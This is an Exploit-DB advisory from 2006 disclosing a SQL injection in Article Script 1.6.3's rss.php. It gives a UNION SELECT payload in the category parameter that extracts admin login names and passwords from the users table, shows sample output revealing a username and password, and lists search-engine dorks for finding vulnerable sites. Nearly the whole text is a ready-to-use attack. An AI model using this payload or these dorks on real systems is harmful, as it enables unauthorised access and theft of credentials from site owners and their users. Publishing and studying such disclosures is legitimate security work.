Article Script 1.6.3 - 'rss.php' SQL Injection

EDB-ID:

2728


Author:

Liz0ziM

Type:

webapps


Platform:

PHP

Date:

2006-11-06


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

Article Script v1.*and v1.6.3 Sql injection

Script Name :Article Script

Home Page:www.articlescript.org

Bug Founder :Liz0ziM

Mail:liz0@bsdmail.org

Baba Kimdir? Tabiki Liz0ziM

------------------------------------------------------------

http://www.victim.com/articles/rss.php?category= ' sql İnjection

Example:

 http://www.victim.com/articles/rss.php?category=-1/**/union/**/select/**/1,2,login,password/**/from/**/users/*

 <title>admin4521title> ------> Admin name :admin4521

 <link>http://www.victim.com/articles/cs1120/page_1/link>  ----------> Admin password cs1120

Dork:

"Powered by Article Script"

":: Article Script - New User Article ::"

intitle:":: Article Script -"

"Last Articles::"

Greatz My all friend

Source: http://www.blogcu.com/Liz0ziM/1312100/

# milw0rm.com [2006-11-06]